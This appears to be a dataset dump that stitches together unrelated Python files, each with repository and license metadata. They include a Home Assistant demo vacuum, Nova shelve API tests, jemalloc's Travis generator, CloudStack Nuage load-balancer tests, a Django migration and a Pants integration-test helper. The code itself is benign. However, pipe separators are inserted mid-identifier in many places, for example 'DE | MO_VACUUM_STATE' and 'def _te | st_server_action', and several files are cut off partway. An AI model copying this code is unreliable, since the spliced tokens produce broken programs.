SUPPORT_FAN_SPEED, SUPPORT_LOCATE, SUPPORT_PAUSE, SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND, SUPPORT_STATUS, SUPPORT_STOP, SUPPORT_TURN_OFF,
SUPPORT_TURN_ON, SUPPORT_STATE, SUPPORT_START, STATE_CLEANING,
STATE_DOCKED, STATE_IDLE, STATE_PAUSED, STATE_RETURNING, VacuumDevice,
StateVacuumDevice)
_LOGGER = logging.getLogger(__name__)
SUPPORT_MINIMAL_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF
SUPPORT_BASIC_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | \
SUPPORT_STATUS | SUPPORT_BATTERY
SUPPORT_MOST_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_STOP | \
SUPPORT_RETURN_HOME | SUPPORT_STATUS | SUPPORT_BATTERY
SUPPORT_ALL_SERVICES = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PAUSE | \
SUPPORT_STOP | SUPPORT_RETURN_HOME | \
SUPPORT_FAN_SPEED | SUPPORT_SEND_COMMAND | \
SUPPORT_LOCATE | SUPPORT_STATUS | SUPPORT_BATTERY | \
SUPPORT_CLEAN_SPOT
SUPPORT_STATE_SERVICES = SUPPORT_STATE | SUPPORT_PAUSE | SUPPORT_STOP | \
SUPPORT_RETURN_HOME | SUPPORT_FAN_SPEED | \
SUPPORT_BATTERY | SUPPORT_CLEAN_SPOT | SUPPORT_START
FAN_SPEEDS = ['min', 'medium', 'high', 'max']
DEMO_VACUUM_COMPLETE = '0_Ground_floor'
DEMO_VACUUM_MOST = '1_First_floor'
DEMO_VACUUM_BASIC = '2_Second_floor'
DEMO_VACUUM_MINIMAL = '3_Third_floor'
DEMO_VACUUM_NONE = '4_Fourth_floor'
DEMO_VACUUM_STATE = '5_Fifth_floor'
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Demo vacuums."""
add_entities([
DemoVacuum(DEMO_VACUUM_COMPLETE, SUPPORT_ALL_SERVICES),
DemoVacuum(DEMO_VACUUM_MOST, SUPPORT_MOST_SERVICES),
DemoVacuum(DEMO_VACUUM_BASIC, SUPPORT_BASIC_SERVICES),
DemoVacuum(DEMO_VACUUM_MINIMAL, SUPPORT_MINIMAL_SERVICES),
DemoVacuum(DEMO_VACUUM_NONE, 0),
StateDemoVacuum(DE | MO_VACUUM_STATE),
])
class DemoVacuum(VacuumDevice):
"""Representation of a demo vacuum."""
def __init__(self, name, supported_features):
"""Initialize the vacuum."""
self._name = name
self | ._supported_features = supported_features
self._state = False
self._status = 'Charging'
self._fan_speed = FAN_SPEEDS[1]
self._cleaned_area = 0
self._battery_level = 100
@property
def name(self):
"""Return the name of the vacuum."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo vacuum."""
return False
@property
def is_on(self):
"""Return true if vacuum is on."""
return self._state
@property
def status(self):
"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_STATUS == 0:
return
return self._status
@property
def fan_speed(self):
"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_FAN_SPEED == 0:
return
return self._fan_speed
@property
def fan_speed_list(self):
"""Return the status of the vacuum."""
assert self.supported_features & SUPPORT_FAN_SPEED != 0
return FAN_SPEEDS
@property
def battery_level(self):
"""Return the status of the vacuum."""
if self.supported_features & SUPPORT_BATTERY == 0:
return
return max(0, min(100, self._battery_level))
@property
def device_state_attributes(self):
"""Return device state attributes."""
return {ATTR_CLEANED_AREA: round(self._cleaned_area, 2)}
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
def turn_on(self, **kwargs):
"""Turn the vacuum on."""
if self.supported_features & SUPPORT_TURN_ON == 0:
return
self._state = True
self._cleaned_area += 5.32
self._battery_level -= 2
self._status = 'Cleaning'
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the vacuum off."""
if self.supported_features & SUPPORT_TURN_OFF == 0:
return
self._state = False
self._status = 'Charging'
self.schedule_update_ha_state()
def stop(self, **kwargs):
"""Stop the vacuum."""
if self.supported_features & SUPPORT_STOP == 0:
return
self._state = False
self._status = 'Stopping the current task'
self.schedule_update_ha_state()
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
if self.supported_features & SUPPORT_CLEAN_SPOT == 0:
return
self._state = True
self._cleaned_area += 1.32
self._battery_level -= 1
self._status = "Cleaning spot"
self.schedule_update_ha_state()
def locate(self, **kwargs):
"""Locate the vacuum (usually by playing a song)."""
if self.supported_features & SUPPORT_LOCATE == 0:
return
self._status = "Hi, I'm over here!"
self.schedule_update_ha_state()
def start_pause(self, **kwargs):
"""Start, pause or resume the cleaning task."""
if self.supported_features & SUPPORT_PAUSE == 0:
return
self._state = not self._state
if self._state:
self._status = 'Resuming the current task'
self._cleaned_area += 1.32
self._battery_level -= 1
else:
self._status = 'Pausing the current task'
self.schedule_update_ha_state()
def set_fan_speed(self, fan_speed, **kwargs):
"""Set the vacuum's fan speed."""
if self.supported_features & SUPPORT_FAN_SPEED == 0:
return
if fan_speed in self.fan_speed_list:
self._fan_speed = fan_speed
self.schedule_update_ha_state()
def return_to_base(self, **kwargs):
"""Tell the vacuum to return to its dock."""
if self.supported_features & SUPPORT_RETURN_HOME == 0:
return
self._state = False
self._status = 'Returning home...'
self._battery_level += 5
self.schedule_update_ha_state()
def send_command(self, command, params=None, **kwargs):
"""Send a command to the vacuum."""
if self.supported_features & SUPPORT_SEND_COMMAND == 0:
return
self._status = 'Executing {}({})'.format(command, params)
self._state = True
self.schedule_update_ha_state()
class StateDemoVacuum(StateVacuumDevice):
"""Representation of a demo vacuum supporting states."""
def __init__(self, name):
"""Initialize the vacuum."""
self._name = name
self._supported_features = SUPPORT_STATE_SERVICES
self._state = STATE_DOCKED
self._fan_speed = FAN_SPEEDS[1]
self._cleaned_area = 0
self._battery_level = 100
@property
def name(self):
"""Return the name of the vacuum."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo vacuum."""
return False
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def state(self):
"""Return the current state of the vacuum."""
return self._state
@property
def battery_level(self):
"""Return the current battery level of the vacuum."""
if self.supported_features & SUPPORT_BATTERY == 0:
return
return max(0, min(100, self._battery_level))
@property
def fan_speed(self):
"""Return the current fan speed of the vacuum."""
if self.supported_features & SUPPORT_FAN_SPE |
rahulunair/nova | nova/tests/functional/api_sample_tests/test_shelve.py | Python | apache-2.0 | 2,812 | 0 | # Copyright 2012 Nebula, Inc.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.tests.functional.api_sample_tests import test_servers
CONF = nova.conf.CONF
class ShelveJsonTest(test_servers.ServersSampleBase):
sample_dir = "os-shelve"
def setUp(self):
super(ShelveJsonTest, self).setUp()
# Don't offload instance, so we can test the offload call.
CONF.set_override('shelved_offload_time', -1)
def _te | st_server_action(self, uuid, template, action):
response = self._do_post('servers/%s/action' % uuid,
template, {'a | ction': action})
self.assertEqual(202, response.status_code)
self.assertEqual("", response.text)
def test_shelve(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
def test_shelve_offload(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-shelve-offload', 'shelveOffload')
def test_unshelve(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve', 'unshelve')
class UnshelveJson277Test(test_servers.ServersSampleBase):
sample_dir = "os-shelve"
microversion = '2.77'
scenarios = [('v2_77', {'api_major_version': 'v2.1'})]
def _test_server_action(self, uuid, template, action, subs=None):
subs = subs or {}
subs.update({'action': action})
response = self._do_post('servers/%s/action' % uuid,
template, subs)
self.assertEqual(202, response.status_code)
self.assertEqual("", response.text)
def test_unshelve_with_az(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve', 'unshelve',
subs={"availability_zone": "us-west"})
def test_unshelve_no_az(self):
uuid = self._post_server()
self._test_server_action(uuid, 'os-shelve', 'shelve')
self._test_server_action(uuid, 'os-unshelve-null', 'unshelve')
|
arangodb/arangodb | 3rdParty/jemalloc/v5.2.1/scripts/gen_travis.py | Python | apache-2.0 | 8,683 | 0.001497 | #!/usr/bin/env python3
from itertools import combinations, chain
from enum import Enum, auto
LINUX = 'linux'
OSX = 'osx'
WINDOWS = 'windows'
AMD64 = 'amd64'
ARM64 = 'arm64'
PPC64LE = 'ppc64le'
TRAVIS_TEMPLATE = """\
# This config file is generated by ./scripts/gen_travis.py.
# Do not edit by hand.
# We use 'minimal', because 'generic' makes Windows VMs hang at startup. Also
# the software provided by 'generic' is simply not needed for our tests.
# Differences are explained here:
# https://docs.travis-ci.com/user/languages/minimal-and-generic/
language: minimal
dist: focal
jobs:
include:
{jobs}
before_install:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/before_install.sh"; then
source ./scripts/$TRAVIS_OS_NAME/before_install.sh
fi
before_script:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/before_script.sh"; then
source ./scripts/$TRAVIS_OS_NAME/before_script.sh
else
scripts/gen_travis.py > travis_script && diff .travis.yml travis_script
autoconf
# If COMPILER_FLAGS are not empty, add them to CC and CXX
./configure ${{COMPILER_FLAGS:+ CC="$CC $COMPILER_FLAGS" \
CXX="$CXX $COMPILER_FLAGS"}} $CONFIGURE_FLAGS
make -j3
make -j3 tests
fi
script:
- |-
if test -f "./scripts/$TRAVIS_OS_NAME/script.sh"; then
source ./scripts/$TRAVIS_OS_NAME/script.sh
else
make check
fi
"""
class Option(object):
class Type:
COMPILER = auto()
COMPILER_FLAG = auto()
CONFIGURE_FLAG = auto()
MALLOC_CONF = auto()
FEATURE = auto()
def __init__(self, type, value):
self.type = type
self.value = value
@staticmethod
def as_compiler(value):
return Option(Option.Type.COMPILER, value)
@staticmethod
def as_compiler_flag(value):
return Option(Option.Type.COMPILER_FLAG, value)
@staticmethod
def as_configure_flag(value):
return Option(Option.Type.CONFIGURE_FLAG, value)
@staticmethod
def as_malloc_conf(value):
return Option(Option.Type.MALLOC_CONF, value)
@staticmethod
def as_feature(value):
return Option(Option.Type.FEATURE, value)
def __eq__(self, obj):
return (isinstance(obj, Option) and obj.type == self.type
and obj.value == self.value)
# The 'default' configuration is gcc, on linux, with no compiler or configure
# flags. We also test with clang, -m32, --enable-debug, --enable-prof,
# --disable-stats, and --with-malloc-conf=tcache:false. To avoid abusing
# travis though, we don't test all 2**7 = 128 possible combinations of these;
# instead, we only test combinations of up to 2 'unusual' settings, under the
# hope that bugs involving interactions of such settings are rare.
MAX_UNUSUAL_OPTIONS = 2
GCC = Option.as_compiler('CC=gcc CXX=g++')
CLANG = Option.as_compiler('CC=clang CXX=clang++')
CL = Option.as_compiler('CC=cl.exe CXX=cl.exe')
compilers_unusual = [CLANG,]
CROSS_COMPILE_32BIT = Option.as_feature('CROSS_COMPILE_32BIT')
feature_unusuals = [CROSS_COMPILE_32BIT]
configure_flag_unusuals = [Option.as_configure_flag(opt) for opt in (
'--enable-debug',
'--enable-prof',
'--disable-stats',
'--disable-libdl',
'--enable-opt-safety-checks',
'--with-lg-page=16',
)]
malloc_conf_unusuals = [Option.as_malloc_conf(opt) for opt in (
'tcache:false',
'dss:primary',
'percpu_arena:percpu',
'background_thread:true',
)]
all_unusuals = (compilers_unusual + feature_unusuals
+ configure_flag_unusuals + malloc_conf_unusuals)
def get_extra_cflags(os, compiler):
if os == WINDOWS:
# For non-CL compilers under Windows (for now it's only MinGW-GCC),
# -fcommon needs to be specified to correctly handle multiple
# 'malloc_conf' symbols and such, which are declared weak under Linux.
# Weak symbols don't work with MinGW-GCC.
if compiler != CL.value:
return ['-fcommon']
else:
return []
# We get some spurious errors when -Warray-bounds is enabled.
extra_cflags = ['-Werror', '-Wno-array-bounds']
if compiler == CLANG.value or os == OSX:
extra_cflags += [
'-Wno-unknown-warning-op | tion',
'-Wno-ignored-attributes'
]
if os == OSX:
extra_cflags += [
'-Wno-deprecated-declarations',
]
return extra_cflags
# Formats a job from a combination of flags
def format_job(os, arch, combination):
compilers = [x.value for x in combination if x.type == Option.Type.COMPILER]
assert(len(compilers) <= 1)
compiler_flags = | [x.value for x in combination if x.type == Option.Type.COMPILER_FLAG]
configure_flags = [x.value for x in combination if x.type == Option.Type.CONFIGURE_FLAG]
malloc_conf = [x.value for x in combination if x.type == Option.Type.MALLOC_CONF]
features = [x.value for x in combination if x.type == Option.Type.FEATURE]
if len(malloc_conf) > 0:
configure_flags.append('--with-malloc-conf=' + ','.join(malloc_conf))
if not compilers:
compiler = GCC.value
else:
compiler = compilers[0]
extra_environment_vars = ''
cross_compile = CROSS_COMPILE_32BIT.value in features
if os == LINUX and cross_compile:
compiler_flags.append('-m32')
features_str = ' '.join([' {}=yes'.format(feature) for feature in features])
stringify = lambda arr, name: ' {}="{}"'.format(name, ' '.join(arr)) if arr else ''
env_string = '{}{}{}{}{}{}'.format(
compiler,
features_str,
stringify(compiler_flags, 'COMPILER_FLAGS'),
stringify(configure_flags, 'CONFIGURE_FLAGS'),
stringify(get_extra_cflags(os, compiler), 'EXTRA_CFLAGS'),
extra_environment_vars)
job = ' - os: {}\n'.format(os)
job += ' arch: {}\n'.format(arch)
job += ' env: {}'.format(env_string)
return job
def generate_unusual_combinations(unusuals, max_unusual_opts):
"""
Generates different combinations of non-standard compilers, compiler flags,
configure flags and malloc_conf settings.
@param max_unusual_opts: Limit of unusual options per combination.
"""
return chain.from_iterable(
[combinations(unusuals, i) for i in range(max_unusual_opts + 1)])
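# Example (added for clarity, not in the original script): for two unusual
# options A and B and max_unusual_opts=2, the generator yields every subset of
# size <= 2, i.e. (), (A,), (B,), (A, B).  Each tuple later becomes one Travis
# job via format_job() above.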
def included(combination, exclude):
"""
Checks if the combination of options should be included in the Travis
testing matrix.
@param exclude: A list of options to be avoided.
"""
return not any(excluded in combination for excluded in exclude)
def generate_jobs(os, arch, exclude, max_unusual_opts, unusuals=all_unusuals):
jobs = []
for combination in generate_unusual_combinations(unusuals, max_unusual_opts):
if included(combination, exclude):
jobs.append(format_job(os, arch, combination))
return '\n'.join(jobs)
def generate_linux(arch):
os = LINUX
# Only generate 2 unusual options for AMD64 to reduce matrix size
max_unusual_opts = MAX_UNUSUAL_OPTIONS if arch == AMD64 else 1
exclude = []
if arch == PPC64LE:
# Avoid 32 bit builds and clang on PowerPC
exclude = (CROSS_COMPILE_32BIT, CLANG,)
return generate_jobs(os, arch, exclude, max_unusual_opts)
def generate_macos(arch):
os = OSX
max_unusual_opts = 1
exclude = ([Option.as_malloc_conf(opt) for opt in (
'dss:primary',
'percpu_arena:percpu',
'background_thread:true')] +
[Option.as_configure_flag('--enable-prof')] +
[CLANG,])
return generate_jobs(os, arch, exclude, max_unusual_opts)
def generate_windows(arch):
os = WINDOWS
max_unusual_opts = 3
unusuals = (
Option.as_configure_flag('--enable-debug'),
CL,
CROSS_COMPILE_32BIT,
)
return generate_jobs(os, arch, (), max_unusual_opts, unusuals)
def get_manual_jobs():
return """\
# Development build
- os: linux
env: CC=gcc CXX=g++ CONFIGURE_FLAGS="--enable-debug \
--disable-cache-oblivious --enable-stats --enable-log --enable-prof" \
EXTRA_CFLAGS="-Werror -Wno-array-bounds"
# |
piskvorky/pattern | pattern/__init__.py | Python | bsd-3-clause | 2,453 | 0.004892 | #### PATTERN ########################################################################## | #############
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD License, see LICENSE.txt
# | Copyright (c) 2010 University of Antwerp, Belgium
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Pattern nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# CLiPS Computational Linguistics Group, University of Antwerp, Belgium
# http://www.clips.ua.ac.be/pages/pattern
### CREDITS ########################################################################################
__author__ = "Tom De Smedt"
__version__ = "2.3"
__copyright__ = "Copyright (c) 2010 University of Antwerp (BE)"
__license__ = "BSD"
####################################################################################################
import os
try:
# prevent en.parser from shadowing the stdlib module parser
import compiler, parser
except ImportError:
pass
__path__.append(os.path.join(__path__[0], "text"))
|
mikn/autobot | setup.py | Python | mit | 648 | 0 | from setuptools import setup, find_packages
with open('requirements.txt') as reqs:
inst_reqs = reqs.read().split('\n')
setup(
name='autobot',
version='0.1.0',
packages=find_packages(),
author='M | ikael Knutsson',
author_email='mikael.knutsson@gmail.com',
description='A bot framework made according to actual software principles',
long_descript | ion=open('README.md').read(),
classifiers=['License :: OSI Approved :: BSD License'],
install_requires=inst_reqs,
entry_points={
'console_scripts': ['autobot = autobot.main:main',
'autobot_init = autobot.init:main']
}
)
|
resmo/cloudstack | test/integration/plugins/nuagevsp/test_nuage_vpc_internal_lb.py | Python | apache-2.0 | 123,514 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
" | "" Component tests for VPC Internal Load Balancer functionality with
Nuage VSP SDN plugin
"""
# Import Local Modules
from nuageTestCase import nuageTestCase
from marvin.lib.base import (Account,
ApplicationLoadBalancer,
Network,
Router)
from marvin.cloudstackAPI import (listInternalLoadBalancerVMs,
stopInternalLoadBalancerVM,
startInternalLoadBalancerVM) |
# Import System Modules
from nose.plugins.attrib import attr
import copy
import time
class TestNuageInternalLb(nuageTestCase):
"""Test VPC Internal LB functionality with Nuage VSP SDN plugin
"""
@classmethod
def setUpClass(cls):
super(TestNuageInternalLb, cls).setUpClass()
return
def setUp(self):
# Create an account
self.account = Account.create(self.api_client,
self.test_data["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = [self.account]
return
# create_Internal_LB_Rule - Creates Internal LB rule in the given
# VPC network
def create_Internal_LB_Rule(self, network, vm_array=None, services=None,
source_ip=None):
self.debug("Creating Internal LB rule in VPC network with ID - %s" %
network.id)
if not services:
services = self.test_data["internal_lbrule"]
int_lb_rule = ApplicationLoadBalancer.create(
self.api_client,
services=services,
sourcenetworkid=network.id,
networkid=network.id,
sourceipaddress=source_ip
)
self.debug("Created Internal LB rule")
# Assigning VMs to the created Internal Load Balancer rule
if vm_array:
self.debug("Assigning virtual machines - %s to the created "
"Internal LB rule" % vm_array)
int_lb_rule.assign(self.api_client, vms=vm_array)
self.debug("Assigned VMs to the created Internal LB rule")
return int_lb_rule
# validate_Internal_LB_Rule - Validates the given Internal LB rule,
# matches the given Internal LB rule name and state against the list of
# Internal LB rules fetched
def validate_Internal_LB_Rule(self, int_lb_rule, state=None,
vm_array=None):
"""Validates the Internal LB Rule"""
self.debug("Check if the Internal LB Rule is created successfully ?")
int_lb_rules = ApplicationLoadBalancer.list(self.api_client,
id=int_lb_rule.id
)
self.assertEqual(isinstance(int_lb_rules, list), True,
"List Internal LB Rule should return a valid list"
)
self.assertEqual(int_lb_rule.name, int_lb_rules[0].name,
"Name of the Internal LB Rule should match with the "
"returned list data"
)
if state:
self.assertEqual(int_lb_rules[0].loadbalancerrule[0].state, state,
"Internal LB Rule state should be '%s'" % state
)
if vm_array:
instance_ids = [instance.id for instance in
int_lb_rules[0].loadbalancerinstance]
for vm in vm_array:
self.assertEqual(vm.id in instance_ids, True,
"Internal LB instance list should have the "
"VM with ID - %s" % vm.id
)
self.debug("Internal LB Rule creation successfully validated for %s" %
int_lb_rule.name)
# list_InternalLbVms - Lists deployed Internal LB VM instances
def list_InternalLbVms(self, network_id=None, source_ip=None):
listInternalLoadBalancerVMsCmd = \
listInternalLoadBalancerVMs.listInternalLoadBalancerVMsCmd()
listInternalLoadBalancerVMsCmd.account = self.account.name
listInternalLoadBalancerVMsCmd.domainid = self.account.domainid
if network_id:
listInternalLoadBalancerVMsCmd.networkid = network_id
internal_lb_vms = self.api_client.listInternalLoadBalancerVMs(
listInternalLoadBalancerVMsCmd)
if source_ip:
return [internal_lb_vm for internal_lb_vm in internal_lb_vms
if str(internal_lb_vm.guestipaddress) == source_ip]
else:
return internal_lb_vms
# get_InternalLbVm - Returns Internal LB VM instance for the given VPC
# network and source ip
def get_InternalLbVm(self, network, source_ip):
self.debug("Finding the InternalLbVm for network with ID - %s and "
"source IP address - %s" % (network.id, source_ip))
internal_lb_vms = self.list_InternalLbVms(network.id, source_ip)
self.assertEqual(isinstance(internal_lb_vms, list), True,
"List InternalLbVms should return a valid list"
)
return internal_lb_vms[0]
# stop_InternalLbVm - Stops the given Internal LB VM instance
def stop_InternalLbVm(self, int_lb_vm, force=False):
self.debug("Stopping InternalLbVm with ID - %s" % int_lb_vm.id)
cmd = stopInternalLoadBalancerVM.stopInternalLoadBalancerVMCmd()
cmd.id = int_lb_vm.id
if force:
cmd.forced = force
self.api_client.stopInternalLoadBalancerVM(cmd)
# start_InternalLbVm - Starts the given Internal LB VM instance
def start_InternalLbVm(self, int_lb_vm):
self.debug("Starting InternalLbVm with ID - %s" % int_lb_vm.id)
cmd = startInternalLoadBalancerVM.startInternalLoadBalancerVMCmd()
cmd.id = int_lb_vm.id
self.api_client.startInternalLoadBalancerVM(cmd)
# check_InternalLbVm_state - Checks if the Internal LB VM instance of the
    # given VPC network and source IP is in the expected state from the list of
# fetched Internal LB VM instances
def check_InternalLbVm_state(self, network, source_ip, state=None):
self.debug("Check if the InternalLbVm is in state - %s" % state)
internal_lb_vms = self.list_InternalLbVms(network.id, source_ip)
self.assertEqual(isinstance(internal_lb_vms, list), True,
"List InternalLbVm should return a valid list"
)
if state:
self.assertEqual(internal_lb_vms[0].state, state,
"InternalLbVm is not in the expected state"
)
self.debug("InternalLbVm instance - %s is in the expected state - %s" %
(internal_lb_vms[0].name, state))
# verify_vpc_vm_ingress_traffic - Verifies ingress traffic to the given VM
# (SSH into VM) via a created Static NAT rule in the given VPC network
def verify_vpc_vm_ingress_traffic(self, vm, network, vpc):
self.debug("Verifying ingress traffic to the VM (SSH into VM) - %s "
"via a created Static NAT rule in the VPC network - |
rkojedzinszky/thermo-center | heatcontrol/migrations/0016_heatcontrol_profile_end_null.py | Python | bsd-3-clause | 473 | 0 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2018-12-27 09:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('heatcontrol', '0015_heatcontrol_prof | ile_add_holes'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='end',
field=models.TimeField(blank=True, nul | l=True),
),
]
|
benjyw/pants | src/python/pants/testutil/pants_integration_test.py | Python | apache-2.0 | 11,626 | 0.002752 | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import glob
import os
import subprocess
import sys
from contextlib import contextmanager
from dataclasses import dataclass
from typing import Any, Iterator, List, Mapping, Optional, Union
import pytest
from pants.base.build_environment import get_buildroot
from pants.base.exiter import PANTS_SUCCEEDED_EXIT_CODE
from pants.option.config import TomlSerializer
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.pantsd.pants_daemon_client import PantsDaemonClient
from pants.testutil._process_handler import SubprocessProcessHandler
from pants.util.contextutil import temporary_dir
from pants.util.dirutil import fast_relpath, safe_file_dump, safe_mkdir, safe_open
from pants.util.osutil import Pid
from pants.util.strutil import ensure_binary
# NB: If `shell=True`, it's a single `str`.
Command = Union[str, List[str]]
@dataclass(frozen=True)
class PantsResult:
command: Command
exit_code: int
stdout: str
stderr: str
workdir: str
pid: Pid
def _format_unexpected_error_code_msg(self, msg: Optional[str]) -> str:
details = [msg] if msg else []
details.append(" ".join(self.command))
details.append(f"exit_code: {self.exit_code}")
def indent(content):
return "\n\t".join(content.splitlines())
details.append(f"stdout:\n\t{indent(self.stdout)}")
details.append(f"stderr:\n\t{indent(self.stderr)}")
return "\n".join(details)
def assert_success(self, msg: Optional[str] = None) -> None:
assert self.exit_code == 0, self._format_unexpected_error_code_msg(msg)
def assert_failure(self, msg: Optional[str] = None) -> None:
assert self.exit_code != 0, self._format_unexpected_error_code_msg(msg)
@dataclass(frozen=True)
class PantsJoinHandle:
command: Command
process: subprocess.Popen
workdir: str
def join(self, stdin_data: bytes | str | None = None, tee_output: bool = False) -> PantsResult:
"""Wait for the pants process to complete, and return a PantsResult for it."""
communicate_fn = self.process.communicate
if tee_output:
# TODO: MyPy complains that SubprocessProcessHandler.communicate_teeing_stdout_and_stderr does
# not have the same type signature as subprocess.Popen.communicate_teeing_stdout_and_stderr.
# It's possibly not worth trying to fix this because the type stubs for subprocess.Popen are
# very complex and also not very precise, given how many different configurations Popen can
# take.
communicate_fn = SubprocessProcessHandler(self.process).communicate_teeing_stdout_and_stderr # type: ignore[assignment]
if stdin_data is not None:
stdin_data = ensure_binary(stdin_data)
(stdout, stderr) = communicate_fn(stdin_data)
if self.process.returncode != PANTS_SUCCEEDED_EXIT_CODE:
render_logs(se | lf.workdir)
return PantsResult(
command=self.command,
exit_code=self.process.returncode,
stdout=stdout.decode(),
stderr=stderr.decode(),
workdir=self.workdir,
pid=self.process.pid,
)
def run_pants_with_workdir_without_waiting(
command: Command,
*,
workdir: str,
he | rmetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
extra_env: Mapping[str, str] | None = None,
print_stacktrace: bool = True,
**kwargs: Any,
) -> PantsJoinHandle:
args = [
"--no-pantsrc",
f"--pants-workdir={workdir}",
f"--print-stacktrace={print_stacktrace}",
]
pantsd_in_command = "--no-pantsd" in command or "--pantsd" in command
pantsd_in_config = config and "GLOBAL" in config and "pantsd" in config["GLOBAL"]
if not pantsd_in_command and not pantsd_in_config:
args.append("--pantsd" if use_pantsd else "--no-pantsd")
if hermetic:
args.append("--pants-config-files=[]")
if config:
toml_file_name = os.path.join(workdir, "pants.toml")
with safe_open(toml_file_name, mode="w") as fp:
fp.write(TomlSerializer(config).serialize())
args.append(f"--pants-config-files={toml_file_name}")
pants_script = [sys.executable, "-m", "pants"]
# Permit usage of shell=True and string-based commands to allow e.g. `./pants | head`.
pants_command: Command
if kwargs.get("shell") is True:
assert not isinstance(command, list), "must pass command as a string when using shell=True"
pants_command = " ".join([*pants_script, " ".join(args), command])
else:
pants_command = [*pants_script, *args, *command]
# Only allow-listed entries will be included in the environment if hermetic=True. Note that
# the env will already be fairly hermetic thanks to the v2 engine; this provides an
    # additional layer of hermeticity.
if hermetic:
# With an empty environment, we would generally get the true underlying system default
# encoding, which is unlikely to be what we want (it's generally ASCII, still). So we
# explicitly set an encoding here.
env = {"LC_ALL": "en_US.UTF-8"}
# Apply our allowlist.
for h in (
"HOME",
"PATH", # Needed to find Python interpreters and other binaries.
"PANTS_PROFILE",
"RUN_PANTS_FROM_PEX",
):
value = os.getenv(h)
if value is not None:
env[h] = value
hermetic_env = os.getenv("HERMETIC_ENV")
if hermetic_env:
for h in hermetic_env.strip(",").split(","):
value = os.getenv(h)
if value is not None:
env[h] = value
else:
env = os.environ.copy()
if extra_env:
env.update(extra_env)
env.update(PYTHONPATH=os.pathsep.join(sys.path))
# Pants command that was called from the test shouldn't have a parent.
if "PANTS_PARENT_BUILD_ID" in env:
del env["PANTS_PARENT_BUILD_ID"]
return PantsJoinHandle(
command=pants_command,
process=subprocess.Popen(
pants_command,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**kwargs,
),
workdir=workdir,
)
def run_pants_with_workdir(
command: Command,
*,
workdir: str,
hermetic: bool = True,
use_pantsd: bool = True,
config: Mapping | None = None,
stdin_data: bytes | str | None = None,
tee_output: bool = False,
**kwargs: Any,
) -> PantsResult:
if config:
kwargs["config"] = config
